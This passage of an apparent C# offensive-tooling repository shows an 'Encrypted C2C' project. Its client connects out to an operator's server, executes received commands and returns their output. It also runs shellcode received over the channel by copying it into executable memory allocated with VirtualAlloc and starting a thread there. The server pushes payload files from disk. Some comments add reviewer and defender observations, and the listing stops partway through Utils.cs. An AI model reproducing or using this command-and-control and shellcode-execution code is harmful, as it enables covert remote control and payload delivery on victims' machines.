├── .editorconfig
├── .gitignore
├── Encryped C2C
├── Client.cs
├── Encrypted C2C.csproj
├── Program.cs
├── Server.cs
└── Utils.cs
├── PE Analysis Using PeNet
├── PE Analysis Using PeNet.csproj
├── PeFileDllAnalysis.txt
├── PeFileExeAnalysis.txt
└── Program.cs
├── PInvoke MSF Payload
├── PInvoke MSF Payload.csproj
└── Program.cs
├── Source Code.sln
├── TCP Bind Shell
├── Program.cs
└── TCP Bind Shell.csproj
└── TCP Reverse Shell
├── Program.cs
└── TCP Reverse Shell.csproj
/.editorconfig:
--------------------------------------------------------------------------------
1 | [*.cs]
2 |
3 | # CA1822: Mark members as static
4 | dotnet_diagnostic.CA1822.severity = none
5 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/csharp,visualstudio,visualstudiocode,jetbrains+all
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=csharp,visualstudio,visualstudiocode,jetbrains+all
4 |
5 | ### Csharp ###
6 | ## Ignore Visual Studio temporary files, build results, and
7 | ## files generated by popular Visual Studio add-ons.
8 | ##
9 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
10 |
11 | # User-specific files
12 | *.rsuser
13 | *.suo
14 | *.user
15 | *.userosscache
16 | *.sln.docstates
17 |
18 | # User-specific files (MonoDevelop/Xamarin Studio)
19 | *.userprefs
20 |
21 | # Mono auto generated files
22 | mono_crash.*
23 |
24 | # Build results
25 | [Dd]ebug/
26 | [Dd]ebugPublic/
27 | [Rr]elease/
28 | [Rr]eleases/
29 | x64/
30 | x86/
31 | [Ww][Ii][Nn]32/
32 | [Aa][Rr][Mm]/
33 | [Aa][Rr][Mm]64/
34 | bld/
35 | [Bb]in/
36 | [Oo]bj/
37 | [Ll]og/
38 | [Ll]ogs/
39 |
40 | # Visual Studio 2015/2017 cache/options directory
41 | .vs/
42 | # Uncomment if you have tasks that create the project's static files in wwwroot
43 | #wwwroot/
44 |
45 | # Visual Studio 2017 auto generated files
46 | Generated\ Files/
47 |
48 | # MSTest test Results
49 | [Tt]est[Rr]esult*/
50 | [Bb]uild[Ll]og.*
51 |
52 | # NUnit
53 | *.VisualState.xml
54 | TestResult.xml
55 | nunit-*.xml
56 |
57 | # Build Results of an ATL Project
58 | [Dd]ebugPS/
59 | [Rr]eleasePS/
60 | dlldata.c
61 |
62 | # Benchmark Results
63 | BenchmarkDotNet.Artifacts/
64 |
65 | # .NET Core
66 | project.lock.json
67 | project.fragment.lock.json
68 | artifacts/
69 |
70 | # ASP.NET Scaffolding
71 | ScaffoldingReadMe.txt
72 |
73 | # StyleCop
74 | StyleCopReport.xml
75 |
76 | # Files built by Visual Studio
77 | *_i.c
78 | *_p.c
79 | *_h.h
80 | *.ilk
81 | *.meta
82 | *.obj
83 | *.iobj
84 | *.pch
85 | *.pdb
86 | *.ipdb
87 | *.pgc
88 | *.pgd
89 | *.rsp
90 | *.sbr
91 | *.tlb
92 | *.tli
93 | *.tlh
94 | *.tmp
95 | *.tmp_proj
96 | *_wpftmp.csproj
97 | *.log
98 | *.tlog
99 | *.vspscc
100 | *.vssscc
101 | .builds
102 | *.pidb
103 | *.svclog
104 | *.scc
105 |
106 | # Chutzpah Test files
107 | _Chutzpah*
108 |
109 | # Visual C++ cache files
110 | ipch/
111 | *.aps
112 | *.ncb
113 | *.opendb
114 | *.opensdf
115 | *.sdf
116 | *.cachefile
117 | *.VC.db
118 | *.VC.VC.opendb
119 |
120 | # Visual Studio profiler
121 | *.psess
122 | *.vsp
123 | *.vspx
124 | *.sap
125 |
126 | # Visual Studio Trace Files
127 | *.e2e
128 |
129 | # TFS 2012 Local Workspace
130 | $tf/
131 |
132 | # Guidance Automation Toolkit
133 | *.gpState
134 |
135 | # ReSharper is a .NET coding add-in
136 | _ReSharper*/
137 | *.[Rr]e[Ss]harper
138 | *.DotSettings.user
139 |
140 | # TeamCity is a build add-in
141 | _TeamCity*
142 |
143 | # DotCover is a Code Coverage Tool
144 | *.dotCover
145 |
146 | # AxoCover is a Code Coverage Tool
147 | .axoCover/*
148 | !.axoCover/settings.json
149 |
150 | # Coverlet is a free, cross platform Code Coverage Tool
151 | coverage*.json
152 | coverage*.xml
153 | coverage*.info
154 |
155 | # Visual Studio code coverage results
156 | *.coverage
157 | *.coveragexml
158 |
159 | # NCrunch
160 | _NCrunch_*
161 | .*crunch*.local.xml
162 | nCrunchTemp_*
163 |
164 | # MightyMoose
165 | *.mm.*
166 | AutoTest.Net/
167 |
168 | # Web workbench (sass)
169 | .sass-cache/
170 |
171 | # Installshield output folder
172 | [Ee]xpress/
173 |
174 | # DocProject is a documentation generator add-in
175 | DocProject/buildhelp/
176 | DocProject/Help/*.HxT
177 | DocProject/Help/*.HxC
178 | DocProject/Help/*.hhc
179 | DocProject/Help/*.hhk
180 | DocProject/Help/*.hhp
181 | DocProject/Help/Html2
182 | DocProject/Help/html
183 |
184 | # Click-Once directory
185 | publish/
186 |
187 | # Publish Web Output
188 | *.[Pp]ublish.xml
189 | *.azurePubxml
190 | # Note: Comment the next line if you want to checkin your web deploy settings,
191 | # but database connection strings (with potential passwords) will be unencrypted
192 | *.pubxml
193 | *.publishproj
194 |
195 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
196 | # checkin your Azure Web App publish settings, but sensitive information contained
197 | # in these scripts will be unencrypted
198 | PublishScripts/
199 |
200 | # NuGet Packages
201 | *.nupkg
202 | # NuGet Symbol Packages
203 | *.snupkg
204 | # The packages folder can be ignored because of Package Restore
205 | **/[Pp]ackages/*
206 | # except build/, which is used as an MSBuild target.
207 | !**/[Pp]ackages/build/
208 | # Uncomment if necessary however generally it will be regenerated when needed
209 | #!**/[Pp]ackages/repositories.config
210 | # NuGet v3's project.json files produces more ignorable files
211 | *.nuget.props
212 | *.nuget.targets
213 |
214 | # Nuget personal access tokens and Credentials
215 | nuget.config
216 |
217 | # Microsoft Azure Build Output
218 | csx/
219 | *.build.csdef
220 |
221 | # Microsoft Azure Emulator
222 | ecf/
223 | rcf/
224 |
225 | # Windows Store app package directories and files
226 | AppPackages/
227 | BundleArtifacts/
228 | Package.StoreAssociation.xml
229 | _pkginfo.txt
230 | *.appx
231 | *.appxbundle
232 | *.appxupload
233 |
234 | # Visual Studio cache files
235 | # files ending in .cache can be ignored
236 | *.[Cc]ache
237 | # but keep track of directories ending in .cache
238 | !?*.[Cc]ache/
239 |
240 | # Others
241 | ClientBin/
242 | ~$*
243 | *~
244 | *.dbmdl
245 | *.dbproj.schemaview
246 | *.jfm
247 | *.pfx
248 | *.publishsettings
249 | orleans.codegen.cs
250 |
251 | # Including strong name files can present a security risk
252 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
253 | #*.snk
254 |
255 | # Since there are multiple workflows, uncomment next line to ignore bower_components
256 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
257 | #bower_components/
258 |
259 | # RIA/Silverlight projects
260 | Generated_Code/
261 |
262 | # Backup & report files from converting an old project file
263 | # to a newer Visual Studio version. Backup files are not needed,
264 | # because we have git ;-)
265 | _UpgradeReport_Files/
266 | Backup*/
267 | UpgradeLog*.XML
268 | UpgradeLog*.htm
269 | ServiceFabricBackup/
270 | *.rptproj.bak
271 |
272 | # SQL Server files
273 | *.mdf
274 | *.ldf
275 | *.ndf
276 |
277 | # Business Intelligence projects
278 | *.rdl.data
279 | *.bim.layout
280 | *.bim_*.settings
281 | *.rptproj.rsuser
282 | *- [Bb]ackup.rdl
283 | *- [Bb]ackup ([0-9]).rdl
284 | *- [Bb]ackup ([0-9][0-9]).rdl
285 |
286 | # Microsoft Fakes
287 | FakesAssemblies/
288 |
289 | # GhostDoc plugin setting file
290 | *.GhostDoc.xml
291 |
292 | # Node.js Tools for Visual Studio
293 | .ntvs_analysis.dat
294 | node_modules/
295 |
296 | # Visual Studio 6 build log
297 | *.plg
298 |
299 | # Visual Studio 6 workspace options file
300 | *.opt
301 |
302 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
303 | *.vbw
304 |
305 | # Visual Studio LightSwitch build output
306 | **/*.HTMLClient/GeneratedArtifacts
307 | **/*.DesktopClient/GeneratedArtifacts
308 | **/*.DesktopClient/ModelManifest.xml
309 | **/*.Server/GeneratedArtifacts
310 | **/*.Server/ModelManifest.xml
311 | _Pvt_Extensions
312 |
313 | # Paket dependency manager
314 | .paket/paket.exe
315 | paket-files/
316 |
317 | # FAKE - F# Make
318 | .fake/
319 |
320 | # CodeRush personal settings
321 | .cr/personal
322 |
323 | # Python Tools for Visual Studio (PTVS)
324 | __pycache__/
325 | *.pyc
326 |
327 | # Cake - Uncomment if you are using it
328 | # tools/**
329 | # !tools/packages.config
330 |
331 | # Tabs Studio
332 | *.tss
333 |
334 | # Telerik's JustMock configuration file
335 | *.jmconfig
336 |
337 | # BizTalk build output
338 | *.btp.cs
339 | *.btm.cs
340 | *.odx.cs
341 | *.xsd.cs
342 |
343 | # OpenCover UI analysis results
344 | OpenCover/
345 |
346 | # Azure Stream Analytics local run output
347 | ASALocalRun/
348 |
349 | # MSBuild Binary and Structured Log
350 | *.binlog
351 |
352 | # NVidia Nsight GPU debugger configuration file
353 | *.nvuser
354 |
355 | # MFractors (Xamarin productivity tool) working folder
356 | .mfractor/
357 |
358 | # Local History for Visual Studio
359 | .localhistory/
360 |
361 | # BeatPulse healthcheck temp database
362 | healthchecksdb
363 |
364 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
365 | MigrationBackup/
366 |
367 | # Ionide (cross platform F# VS Code tools) working folder
368 | .ionide/
369 |
370 | # Fody - auto-generated XML schema
371 | FodyWeavers.xsd
372 |
373 | # VS Code files for those working on multiple tools
374 | .vscode/*
375 | !.vscode/settings.json
376 | !.vscode/tasks.json
377 | !.vscode/launch.json
378 | !.vscode/extensions.json
379 | *.code-workspace
380 |
381 | # Local History for Visual Studio Code
382 | .history/
383 |
384 | # Windows Installer files from build outputs
385 | *.cab
386 | *.msi
387 | *.msix
388 | *.msm
389 | *.msp
390 |
391 | # JetBrains Rider
392 | .idea/
393 | *.sln.iml
394 |
395 | ### JetBrains+all ###
396 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
397 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
398 |
399 | # User-specific stuff
400 | .idea/**/workspace.xml
401 | .idea/**/tasks.xml
402 | .idea/**/usage.statistics.xml
403 | .idea/**/dictionaries
404 | .idea/**/shelf
405 |
406 | # AWS User-specific
407 | .idea/**/aws.xml
408 |
409 | # Generated files
410 | .idea/**/contentModel.xml
411 |
412 | # Sensitive or high-churn files
413 | .idea/**/dataSources/
414 | .idea/**/dataSources.ids
415 | .idea/**/dataSources.local.xml
416 | .idea/**/sqlDataSources.xml
417 | .idea/**/dynamic.xml
418 | .idea/**/uiDesigner.xml
419 | .idea/**/dbnavigator.xml
420 |
421 | # Gradle
422 | .idea/**/gradle.xml
423 | .idea/**/libraries
424 |
425 | # Gradle and Maven with auto-import
426 | # When using Gradle or Maven with auto-import, you should exclude module files,
427 | # since they will be recreated, and may cause churn. Uncomment if using
428 | # auto-import.
429 | # .idea/artifacts
430 | # .idea/compiler.xml
431 | # .idea/jarRepositories.xml
432 | # .idea/modules.xml
433 | # .idea/*.iml
434 | # .idea/modules
435 | # *.iml
436 | # *.ipr
437 |
438 | # CMake
439 | cmake-build-*/
440 |
441 | # Mongo Explorer plugin
442 | .idea/**/mongoSettings.xml
443 |
444 | # File-based project format
445 | *.iws
446 |
447 | # IntelliJ
448 | out/
449 |
450 | # mpeltonen/sbt-idea plugin
451 | .idea_modules/
452 |
453 | # JIRA plugin
454 | atlassian-ide-plugin.xml
455 |
456 | # Cursive Clojure plugin
457 | .idea/replstate.xml
458 |
459 | # Crashlytics plugin (for Android Studio and IntelliJ)
460 | com_crashlytics_export_strings.xml
461 | crashlytics.properties
462 | crashlytics-build.properties
463 | fabric.properties
464 |
465 | # Editor-based Rest Client
466 | .idea/httpRequests
467 |
468 | # Android studio 3.1+ serialized cache file
469 | .idea/caches/build_file_checksums.ser
470 |
471 | ### JetBrains+all Patch ###
472 | # Ignores the whole .idea folder and all .iml files
473 | # See https://github.com/joeblau/gitignore.io/issues/186 and https://github.com/joeblau/gitignore.io/issues/360
474 |
475 |
476 | # Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-249601023
477 |
478 | *.iml
479 | modules.xml
480 | .idea/misc.xml
481 | *.ipr
482 |
483 | # Sonarlint plugin
484 | .idea/sonarlint
485 |
486 | ### VisualStudioCode ###
487 |
488 | # Local History for Visual Studio Code
489 |
490 | ### VisualStudioCode Patch ###
491 | # Ignore all local history of files
492 | .history
493 | .ionide
494 |
495 | ### VisualStudio ###
496 |
497 | # User-specific files
498 |
499 | # User-specific files (MonoDevelop/Xamarin Studio)
500 |
501 | # Mono auto generated files
502 |
503 | # Build results
504 |
505 | # Visual Studio 2015/2017 cache/options directory
506 | # Uncomment if you have tasks that create the project's static files in wwwroot
507 |
508 | # Visual Studio 2017 auto generated files
509 |
510 | # MSTest test Results
511 |
512 | # NUnit
513 |
514 | # Build Results of an ATL Project
515 |
516 | # Benchmark Results
517 |
518 | # .NET Core
519 |
520 | # ASP.NET Scaffolding
521 |
522 | # StyleCop
523 |
524 | # Files built by Visual Studio
525 |
526 | # Chutzpah Test files
527 |
528 | # Visual C++ cache files
529 |
530 | # Visual Studio profiler
531 |
532 | # Visual Studio Trace Files
533 |
534 | # TFS 2012 Local Workspace
535 |
536 | # Guidance Automation Toolkit
537 |
538 | # ReSharper is a .NET coding add-in
539 |
540 | # TeamCity is a build add-in
541 |
542 | # DotCover is a Code Coverage Tool
543 |
544 | # AxoCover is a Code Coverage Tool
545 |
546 | # Coverlet is a free, cross platform Code Coverage Tool
547 |
548 | # Visual Studio code coverage results
549 |
550 | # NCrunch
551 |
552 | # MightyMoose
553 |
554 | # Web workbench (sass)
555 |
556 | # Installshield output folder
557 |
558 | # DocProject is a documentation generator add-in
559 |
560 | # Click-Once directory
561 |
562 | # Publish Web Output
563 | # Note: Comment the next line if you want to checkin your web deploy settings,
564 | # but database connection strings (with potential passwords) will be unencrypted
565 |
566 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
567 | # checkin your Azure Web App publish settings, but sensitive information contained
568 | # in these scripts will be unencrypted
569 |
570 | # NuGet Packages
571 | # NuGet Symbol Packages
572 | # The packages folder can be ignored because of Package Restore
573 | # except build/, which is used as an MSBuild target.
574 | # Uncomment if necessary however generally it will be regenerated when needed
575 | # NuGet v3's project.json files produces more ignorable files
576 |
577 | # Nuget personal access tokens and Credentials
578 |
579 | # Microsoft Azure Build Output
580 |
581 | # Microsoft Azure Emulator
582 |
583 | # Windows Store app package directories and files
584 |
585 | # Visual Studio cache files
586 | # files ending in .cache can be ignored
587 | # but keep track of directories ending in .cache
588 |
589 | # Others
590 |
591 | # Including strong name files can present a security risk
592 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
593 |
594 | # Since there are multiple workflows, uncomment next line to ignore bower_components
595 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
596 |
597 | # RIA/Silverlight projects
598 |
599 | # Backup & report files from converting an old project file
600 | # to a newer Visual Studio version. Backup files are not needed,
601 | # because we have git ;-)
602 |
603 | # SQL Server files
604 |
605 | # Business Intelligence projects
606 |
607 | # Microsoft Fakes
608 |
609 | # GhostDoc plugin setting file
610 |
611 | # Node.js Tools for Visual Studio
612 |
613 | # Visual Studio 6 build log
614 |
615 | # Visual Studio 6 workspace options file
616 |
617 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
618 |
619 | # Visual Studio LightSwitch build output
620 |
621 | # Paket dependency manager
622 |
623 | # FAKE - F# Make
624 |
625 | # CodeRush personal settings
626 |
627 | # Python Tools for Visual Studio (PTVS)
628 |
629 | # Cake - Uncomment if you are using it
630 | # tools/**
631 | # !tools/packages.config
632 |
633 | # Tabs Studio
634 |
635 | # Telerik's JustMock configuration file
636 |
637 | # BizTalk build output
638 |
639 | # OpenCover UI analysis results
640 |
641 | # Azure Stream Analytics local run output
642 |
643 | # MSBuild Binary and Structured Log
644 |
645 | # NVidia Nsight GPU debugger configuration file
646 |
647 | # MFractors (Xamarin productivity tool) working folder
648 |
649 | # Local History for Visual Studio
650 |
651 | # BeatPulse healthcheck temp database
652 |
653 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
654 |
655 | # Ionide (cross platform F# VS Code tools) working folder
656 |
657 | # Fody - auto-generated XML schema
658 |
659 | # VS Code files for those working on multiple tools
660 |
661 | # Local History for Visual Studio Code
662 |
663 | # Windows Installer files from build outputs
664 |
665 | # JetBrains Rider
666 |
667 | ### VisualStudio Patch ###
668 | # Additional files built by Visual Studio
669 |
670 | # End of https://www.toptal.com/developers/gitignore/api/csharp,visualstudio,visualstudiocode,jetbrains+all
--------------------------------------------------------------------------------
/Encryped C2C/Client.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net.Sockets;
3 | using System.Net;
4 | using System.IO;
5 | using System.Linq;
6 |
7 | class Client: IDisposable { // Connecting side of the channel: dials out, sends a fresh IV/key, then runs whatever the server sends back
8 | readonly TcpClient tcp;
9 | readonly IPAddress host;
10 | readonly int port;
11 | string iv, key; // session IV and key kept as printable strings; Utils turns them into bytes with Encoding.ASCII
12 |
13 | /// <summary>
14 | /// Initialize the client; nothing is connected until Setup() runs
15 | /// </summary>
16 | /// <param name="host">IP address to connect to</param>
17 | /// <param name="port">Port number</param>
18 | public Client(IPAddress host, int port) {
19 | this.host = host;
20 | this.port = port;
21 | tcp = new TcpClient();
22 | iv = key = string.Empty;
23 | }
24 |
25 | /// <summary>
26 | /// Connect to the host and open tcp stream; blocks inside ReadInputs until the session ends
27 | /// </summary>
28 | public void Setup() {
29 | tcp.Connect(host, port);
30 | using var stream = tcp.GetStream(); ReadInputs(stream); // the stream is also closed by the reader/writer disposed inside ReadInputs
31 | }
32 |
33 | /// <summary>
34 | /// Handle tcp stream: send IV and key, then loop reading one base64 line per command and writing one base64 line per reply
35 | /// </summary>
36 | /// <param name="stream">Connected stream obtained from the TcpClient</param>
37 | private void ReadInputs(NetworkStream stream) {
38 | if (!Utils.HasExchangedKeys) { // static flag on Utils, so it is shared by the whole process, not per connection
39 | Utils.HasExchangedKeys = !Utils.HasExchangedKeys;
40 | iv = Utils.GetRandomString(16); // 16 ASCII characters -> 16 bytes, the AES block size
41 | key = Utils.GetRandomString(32); // 32 ASCII characters -> 32 bytes, an AES-256 key
42 | }
43 |
44 | using (var ws = new StreamWriter(stream) { AutoFlush = true })
45 | using (var rs = new StreamReader(stream)) {
46 | ws.WriteLine(iv); // NOTE(review): IV and key cross the wire as plain text lines, so a capture of the session start is enough to decrypt all later traffic
47 | ws.WriteLine(key); // Defender note: the session opens with a 16-character and a 32-character printable line from the connecting side, followed by base64 lines in both directions
48 |
49 | while(true) {
50 | string cmd = rs.ReadLine(); // null when the peer closes the connection
51 | if (string.IsNullOrEmpty(cmd)) {
52 | break;
53 | }
54 |
55 | string dec = Utils.DecryptData(Utils.DeserializeData(cmd), iv, key); // base64-decode, then AES-decrypt; nothing in this class catches the exceptions a malformed line raises
56 |
57 | if (dec.ToLower() == "exit") { // case-insensitive via culture-sensitive ToLower()
58 | break;
59 | } else if (string.IsNullOrEmpty(dec) || string.IsNullOrWhiteSpace(dec)) { // IsNullOrWhiteSpace alone already covers the empty case
60 | continue;
61 | }
62 |
63 | // shellcode run: the literal marker ":shellcode:" announces that the next line carries a payload
64 | if (dec == ":shellcode:") {
65 | // get the shellcode (second line of the two-line message)
66 | var rawShellCode = rs.ReadLine();
67 | if (string.IsNullOrEmpty(rawShellCode) || string.IsNullOrWhiteSpace(rawShellCode)) continue;
68 |
69 | // decrypt shellcode; the plaintext is still base64 text at this point
70 | var decryptedData = Utils.DecryptData(Utils.DeserializeData(rawShellCode), iv, key);
71 | if (string.IsNullOrEmpty(decryptedData) || string.IsNullOrWhiteSpace(decryptedData)) continue;
72 |
73 | // deserialize the decrypted data to get the actual shellcode in bytes
74 | byte[] shellcode = Utils.DeserializeData(decryptedData);
75 |
76 | // execute shellcode on a new thread (see Utils.ExecuteShellCode); the fixed reply below is sent without waiting for or checking the outcome
77 | Utils.ExecuteShellCode(shellcode);
78 | ws.WriteLine(Utils.SerializeBytes(Utils.EncryptData("Executing shellcode", iv, key)));
79 | } else {
80 | string[] parts = dec.Split(' '); // plain split on single spaces: quoted arguments are not kept together
81 | string fileName = parts.First(); // first token is the program to start
82 |
83 |
84 | string[] args = parts.Skip(1).ToArray(); // remaining tokens are passed on as its arguments
85 |
86 | string output = Utils.ExecuteCommand(fileName, args);
87 | var enc = Utils.EncryptData(output.Trim(), iv, key);
88 |
89 | ws.WriteLine(Utils.SerializeBytes(enc)); // reply is one base64 line holding the AES ciphertext of the command output
90 | }
91 | }
92 | }
93 | }
94 |
95 | /// <summary>
96 | /// Dispose the resources committed by class: close the TCP client and drop the references to the IV/key strings
97 | /// </summary>
98 | public void Dispose() {
99 | tcp.Close();
100 | iv = key = string.Empty; // only replaces the references; the old strings are immutable and are not overwritten in memory
101 | }
102 | }
103 |
--------------------------------------------------------------------------------
/Encryped C2C/Encrypted C2C.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | Encryped_C2C
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Encryped C2C/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 |
class Program {
    /// <summary>
    /// Entry point. With exactly one argument the process listens as the
    /// server on that port; with two or more it connects as the client to
    /// the address in args[0] on the port in args[1].
    /// </summary>
    /// <param name="args">Either [port] or [host, port]</param>
    static void Main(string[] args) {
        // No arguments: fail with the usage text.
        if (args.Length == 0) {
            throw new ArgumentException("Usage: application [] ");
        }

        // Convert.ToInt32 and IPAddress.Parse throw on malformed input, and
        // the port is not range-checked here.
        if (args.Length == 1) {
            // Server mode: the single argument is the port to listen on.
            int listenPort = Convert.ToInt32(args[0]);
            using (var server = new Server(listenPort)) {
                server.Setup();
            }
            return;
        }

        // Client mode: host first, then port (same parse order as before).
        IPAddress remoteHost = IPAddress.Parse(args[0]);
        int remotePort = Convert.ToInt32(args[1]);
        using (var client = new Client(remoteHost, remotePort)) {
            client.Setup();
        }
    }
}
33 |
--------------------------------------------------------------------------------
/Encryped C2C/Server.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.IO;
4 | using System.Net.Sockets;
5 |
6 | class Server : IDisposable { // Listening side of the channel: accepts a client, takes its IV/key, then relays commands typed at the console
7 | TcpListener tcp;
8 | string iv, key; // overwritten with whatever the connected client sends first
9 |
10 | /// <summary>
11 | /// Initialize the tcp server; the listener is bound to IPAddress.Any, i.e. every local interface
12 | /// </summary>
13 | /// <param name="port">Port number</param>
14 | public Server(int port) {
15 | tcp = new TcpListener(IPAddress.Any, port);
16 | iv = key = string.Empty;
17 | }
18 |
19 | /// <summary>
20 | /// Start the server and accept connections; blocks until AcceptConnections returns
21 | /// </summary>
22 | public void Setup() {
23 | tcp.Start();
24 | AcceptConnections();
25 | }
26 |
27 |
28 | /// <summary>
29 | /// Accept and handle connections one at a time; the next client is accepted only after the current session ends
30 | /// </summary>
31 | private void AcceptConnections() {
32 | while (true) {
33 | try {
34 | using(var client = tcp.AcceptTcpClient()) {
35 | string addr = client.Client.RemoteEndPoint.ToString();
36 | Console.WriteLine("[!] Client Connected: tcp://{0}", addr);
37 |
38 | using (var stream = client.GetStream()) {
39 | using (var ws = new StreamWriter(stream) { AutoFlush = true }) {
40 | using(var rs = new StreamReader(stream)) {
41 | iv = rs.ReadLine(); // NOTE(review): IV and key arrive as the first two plain-text lines and are used as received, with no length or content check here
42 | key = rs.ReadLine(); // anyone able to observe the connection therefore holds the session key as well
43 |
44 | while (true) {
45 | Console.Write("> ");
46 | string cmd = Console.ReadLine().Trim(); // ReadLine() returns null at end of input; the resulting exception lands in the catch below
47 | if (cmd.ToLower() == "exit") break;
48 |
49 | byte[] enc;
50 | if (cmd.ToLower().StartsWith(":read:") && cmd.Split(' ').Length == 2) { // operator form ":read: <path>", exactly two space-separated tokens
51 | // send the ":shellcode:" marker first so the client treats the next line as a payload
52 | ws.WriteLine(Utils.SerializeBytes(Utils.EncryptData(":shellcode:", iv, key)));
53 |
54 | // read the payload file from the local disk of the machine running the server
55 | var filePath = cmd.Split(' ')[1];
56 | var shellcode = Utils.ReadBinaryFile(filePath);
57 |
58 | // encrypt the shellcode: bytes -> base64 text -> AES; the ciphertext is base64-encoded again below before sending
59 | enc = Utils.EncryptData(Utils.SerializeBytes(shellcode), iv, key);
60 | } else {
61 | // send command as typed
62 | enc = Utils.EncryptData(cmd, iv, key);
63 | }
64 |
65 | string serialized = Utils.SerializeBytes(enc);
66 | ws.WriteLine(serialized);
67 | string output = rs.ReadLine(); // one reply line per message; null if the client has disconnected
68 | string decrypted = Utils.DecryptData(Utils.DeserializeData(output), iv, key); // a null or malformed reply throws here and is handled by the catch below
69 | Console.WriteLine(decrypted);
70 | }
71 | }
72 | }
73 | }
74 |
75 | Console.WriteLine("[!] Client Disconnected: {0}", addr);
76 | }
77 | } catch (Exception e) { // catch-all: any failure prints its message and ends the accept loop, so the server stops serving
78 | Console.WriteLine("[x] Error: {0}", e.Message);
79 | break;
80 | }
81 | }
82 |
83 | }
84 |
85 | /// <summary>
86 | /// Stop the server and release the resources
87 | /// </summary>
88 | public void Dispose() {
89 | tcp.Stop();
90 | iv = key = string.Empty; // only replaces the references; the received strings are not overwritten in memory
91 | }
92 | }
93 |
--------------------------------------------------------------------------------
/Encryped C2C/Utils.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Security.Cryptography;
4 | using System.IO;
5 | using System.Diagnostics;
6 | using System.Runtime.InteropServices;
7 | using System.Threading;
8 |
9 | internal class Utils { // Static helpers shared by Client.cs and Server.cs: AES, base64, process execution and in-memory payload execution
10 | [DllImport("kernel32.dll")]
11 | static extern IntPtr VirtualAlloc(IntPtr address, uint dwSize, uint allocType, uint mode);
12 |
13 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
14 | delegate void WindowRun(); // parameterless native entry point used to call into the copied buffer
15 |
16 | private static bool hasExchangeKey = false; // process-wide flag behind HasExchangedKeys
17 | private static string charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890,./<>?;':`~!@#$%^&*()-=_+"; // printable ASCII only, so every generated key/IV byte comes from this small alphabet
18 |
19 | /// <summary>
20 | /// Execute the shellcode in thread: copy the bytes into newly allocated memory and start a thread at its first byte
21 | /// </summary>
22 | /// <param name="shellcode">Raw shellcode content</param>
23 | public static void ExecuteShellCode(byte[] shellcode) {
24 | // get pointer of allocated buffer. Defender note: private memory that is writable and executable at once, followed by a thread starting inside it, is a common detection point for EDR and memory scanners
25 | IntPtr ptr = VirtualAlloc(IntPtr.Zero, Convert.ToUInt32(shellcode.Length), 0x1000, 0x40); // 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE; the returned pointer is not checked for IntPtr.Zero
26 | Marshal.Copy(shellcode, 0x0, ptr, shellcode.Length);
27 | WindowRun r = Marshal.GetDelegateForFunctionPointer(ptr); // NOTE(review): as listed the call has no delegate type argument; a generic argument was presumably lost when the page was extracted - confirm against the repository
28 |
29 | ThreadStart s = new(r);
30 | new Thread(s).Start(); // started and not joined; the method returns immediately and the allocation is never freed here
31 | }
32 |
33 | /// <summary>
34 | /// Read the binary file and return bytes
35 | /// </summary>
36 | /// <param name="path">Path of the file to read (the author's note asks for an absolute path; the code passes it to File.OpenRead unchanged)</param>
37 | /// <returns>Raw content of binary file</returns>
38 | public static byte[] ReadBinaryFile(string path) {
39 | // get file stream
40 | using(var file = File.OpenRead(path)) {
41 |
42 | // get binary stream from file
43 | using(var bReader = new BinaryReader(file)) {
44 | using (var ms = new MemoryStream()) {
45 | // read into memory in 1024-byte chunks until all bytes are read from file and cursor reached EOF
46 | while (true) {
47 | byte[] buf = bReader.ReadBytes(1024);
48 | if (buf.Length == 0) { // ReadBytes returns an empty array at end of stream
49 | break;
50 | } else {
51 | ms.Write(buf);
52 | }
53 | }
54 | return ms.ToArray();
55 | }
56 | }
57 | }
58 | }
59 |
60 | /// <summary>
61 | /// Execute command with args and return output (stderr first, then stdout, decoded as ASCII)
62 | /// </summary>
63 | /// <param name="fileName">File name in %PATH% environment variable</param>
64 | /// <param name="args">Arguments for the file; joined with single spaces, without any quoting</param>
65 | /// <returns>Output of the command, or the exception message followed by a newline if the run failed</returns>
66 | public static string ExecuteCommand(string fileName, string[] args) {
67 | string output = string.Empty;
68 |
69 | // Copy raw content in memory
70 | using(var stream = new MemoryStream()) {
71 |
72 | var process = new Process() { StartInfo = new ProcessStartInfo(fileName, string.Join(' ', args)) { UseShellExecute = false, RedirectStandardError = true, RedirectStandardOutput = true } }; // the Process object is never disposed
73 |
74 | try {
75 | process.Start();
76 |
77 | process.StandardError.BaseStream.CopyTo(stream); // NOTE(review): stderr is drained to its end before stdout is touched; a child that fills the stdout pipe while stderr is still open can stall here
78 | process.StandardOutput.BaseStream.CopyTo(stream);
79 |
80 | process.WaitForExit();
81 | } catch (Exception e) {
82 | // handle error and pipe to memory stream, so the caller receives the message as if it were command output
83 | stream.Write(Encoding.ASCII.GetBytes(e.Message + '\n'));
84 | } finally {
85 | // convert bytes to string; ASCII decoding replaces every non-ASCII byte with '?'
